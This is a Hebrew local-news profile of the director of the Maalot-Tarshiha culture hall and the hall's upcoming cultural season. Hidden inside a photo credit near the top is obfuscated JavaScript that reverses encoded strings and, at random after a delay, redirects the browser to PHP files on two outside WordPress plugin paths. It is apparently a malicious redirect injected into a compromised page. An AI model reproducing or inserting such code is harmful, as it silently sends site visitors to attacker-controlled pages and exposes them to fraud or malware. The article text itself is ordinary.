fbpx
[shortcode-weather-atlas city_selector=1178237 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

היכל תרבות שהוא בית

מסתבר שמאחורי כל היכל מצליח יש מנהלת מעולה. תכירו את דפנה רופאייזן-לוי שבשנים האחרונות הפכה את היכל התרבות מעלות-תרשיחא למרכז תרבות תוסס ומוביל בגליל
היכל התרבות מעלות דפנה ר. לוי באדיבות: Ritbo pho$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tography פורטל נהריה לינק

בשנים האחרונות הפך היכל התרבות מעלות תרשיחא להיכל המוביל באזור הגליל המערבי, למרכז תרבות איכותי ותוסס, המארח בין כתליו את גדולי האומנים בישראל ורבבות מנויים וצופים, המבקרים בו בכל ימות השנה.

היכל התרבות הוא גם הבית השני של דפנה רופאייזן-לוי, מנהלת ההיכל, שהגיעה אליו בפברואר 2011 עם ניסיון רב, ותשוקה להפיח בו חיים, להכניס תכנים וליצור מרכז תרבות ואמנויות שיהפוך חלק מחיי היום והערב של תושבי הגליל.

רופאייזן-לוי, נשואה ואמא לשני ילדים בוגרים, בן רופא כירורג (33) ובת מנצחת בניו יורק (31) בוגרת ג'וליארד. היא שירתה בצה"ל כמנהלת לשכה של אלוף אהוד ברק. במהלך שירותה הצבאי החלה ללמוד לתואר ראשון בשפה וספרות אנגלית, המשיכה לתואר שני בפילוסופיה ומנהל ציבורי, אותו סיימה באוניברסיטת חיפה. במשך שבע שנים הייתה מרצה לשפה האנגלית במכללת הגליל המערבי ובהמשך, ניהלה את היכל התרבות בעכו כ-18 שנה.

אחרי ראיונות ומבחנים, אותם עברה בהצלחה, נבחרה, כאמור משנת 2011, לנהל את ההיכל.

"הגעתי לבניין מפואר, להיכל יפהפה, ריק מכל תוכן, מריהוט וממחשבים", היא מספרת, "התחלתי את עבודתי מאפס, יצקתי לתוך ההיכל תכני תרבות עשירים וקיבלתי את מלוא התמיכה מעיריית מעלות תרשיחא והעומד בראשה, שלמה בוחבוט וסילס לביליה אז מנכ"ל העירייה, היום מנכ"ל החברה הכלכלית מטה אשר. עד מהרה הפך המקום ל"אבן שואבת" לכל תושבי הגליל המערבי, מעלות וסביבתה.

 

 

היכל התרבות מעלות באדיבות: Ritbo photography פורטל נהריה לינק

מה את מתכננת לנו השנה?

"ההיכל שלנו מביא מגוון סדרות של תרבות. גולת הכותרת הוא מפעל המנויים לתיאטרון שיפתח ב- 21.11.19 בשעה 20:00. המנויים יזכו לקבלת פנים חגיגית ויצפו ביצירת המופת, "רודף העפיפונים" מאת חאלד חוסייני בביצוע תיאטרון גשר, אשר תתקיים במשך שלושה ימים ברצף.

עונת התיאטרון תסתיים בהפקת ענק מרהיבה ובלעדית של תיאטרון הבימה, הכוללת את גדולי השחקנים בארץ ובהם: טוביה צפיר, ניצה שאול, סנדרה שדה, שלומי קוריאט, רוני דלומי ואחרים.

זוהי הפקה רבת משתתפים ומרגשת שהקהל לא ישכח.

בנוסף לסדרת התיאטרון ההיכל מציג: סדרת מחול, סדרת מוזיקה, תיאטרון לילדים, מופעים בשפה הרוסית, מופעי בידור, מופעי זמר עברי וקולנוע איכותי ועכשווי במסגרת סינמה מעלות.

היכל התרבות מעלות-תרשיחא עובד שבעה ימים בשבוע, יש בו 500 מקומות ישיבה ובית קפה שיעבור שדרוג בכמיליון וחצי שקלים בשנה וחצי הקרובה.

סדרת המחול היא אחת המוצלחות בארץ כאשר מגיעים אליה מכל רחבי האזור: תושבי משגב, מטה אשר, מעלה יוסף, קריות, תרשיחא, מעיליא, חורפיש ועוד. השנה יתארחו בסדרת המחול הבלט הישראלי, להקת ורטיגו ולהקת מיומנה במופע "זרמים".

סדרת המוזיקה תיפתח עם הגדולה מכולן, חווה אלברשטיין, בהמשך תגיע לעיר התזמורת הקאמרית הישראלית בקונצרט מיצירותיו של מוצארט".

עבור דפנה זהו מפעל חיים. בין לבין היא משיבה לטלפונים, מאוד עניינית, דואגת שהכל יהיה מתוקתק ולרגע לא מאבדת את חוט המחשבה. "כמו כן, יגיע המופע הפופולארי והמטורף של פטשקה – לוגאסי – שוחט, "כשהאופרה פוגשת את הג'אז".

בזמר העברי נסיים עם קובי אפללו שהוא יליד מעלות וזו הזדמנות פז עבורו לחזור למקורות.

ראוי לציין את הפעילות המרובה והשוקקת שיש לנו לדוברי הרוסית: הצגות תיאטרון ממוסקבה מגיעות להיכל ואנו מציעים תרבות רוסית עשירה על כל גווניה: תיאטרון, מוזיקה, בידור ומחול, זאת בזכות שיתופי פעולה עם נציגים מקומיים וכמובן, בעידוד ראש העיר".

"לאחרונה", מעדכנת דפנה, "גוברת הפעילות גם במגזר הדתי ונעשית פעילות ענפה בתחום תרבות תורנית, הצגות והרצאות.

מבנה ההיכל מוצלח במיוחד, במה מרשימה, אקוסטיקה מצוינת, נראות מיטבית, מרווחים נוחים בין הכיסאות ונגישות לנכים. ההיכל עטוף בנוף פסטורלי מקסים, צמחייה מטופחת ומעניק תחושת חג תמידית לכל באי ההיכל.

רק לפני שבועיים אמרה לי חנה לסלאו: "כי היא פשוט שמחה לחזור להיכל התרבות מעלות", ואכן ההצגה "אמא מאוהבת" שבה היא מככבת זכתה להצלחה רבה.

חשוב לציין שהיכל התרבות מעלות תרשיחא פועל כחלק אינטגרלי מעיריית מעלות- תרשיחא.

ההיכל נהנה מתמיכה מלאה ומרוח גבית של העומד בראשה, ארקדי פומרנץ, מנכ"ל עיריית מעלות תרשיחא עמית לוין ויועצת ראש העיר- הגברת אלינה פאסוב, בזכותם ובזכות כל המנויים והתושבים הנאמנים, מתאפשרת בהיכל התרבות מעלות תרשיחא פעילות עשירה, עדכנית ומגוונת.

המטרה היא לחיות בצפון וליהנות מתרבות כמו במרכז". מסכמת דפנה בסיפוק.

היכל התרבות מעלות תרשיחא: 04-9573050, http://heical-maalot.co.il

 

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות